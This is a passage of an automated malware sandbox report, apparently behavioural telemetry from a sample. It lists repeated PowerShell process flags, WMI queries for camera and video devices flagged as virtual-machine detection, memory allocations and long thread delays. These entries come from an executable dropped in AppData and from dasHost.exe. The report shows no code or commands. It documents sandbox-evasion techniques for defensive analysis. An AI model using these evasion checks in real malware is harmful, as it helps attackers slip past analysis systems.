                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                                    Malware Analysis System Evasion

                                    barindex
                                    Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeMemory allocated: C00000 memory reserve | memory write watchJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeMemory allocated: 1A9C0000 memory reserve | memory write watchJump to behavior
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeMemory allocated: 1970000 memory reserve | memory write watch
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeMemory allocated: 1B1B0000 memory reserve | memory write watch
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 600000
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 599868
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 599672
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 598891
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 598219
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 3600000
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 597750
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 597391
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 596688
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 596266
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 595969
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 595438
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 595154
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 594875
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 594555
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 594203
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 593953
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 593669
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 593328
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 593010
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 592656
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 592402
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 592078
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 591781
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 591391
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 591094
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 590359
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 589968
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 589469
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 589063
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 588547
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 587266
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 586928
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 586484
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 586063
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 585484
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 584531
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 584078
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 583594
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 583188
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 582702
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 581719
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 581336
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 580906
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 580672
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 580503
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 580281
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 580031
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 579762
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 579429
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 578953
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 578703
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 578484
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 578266
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 578065
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 577828
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 577670
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 577500
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 577248
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 577094
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 576828
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 576641
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 575922
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 575719
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 575479
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 575239
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 574984
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 574688
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 574496
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 574363
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 574234
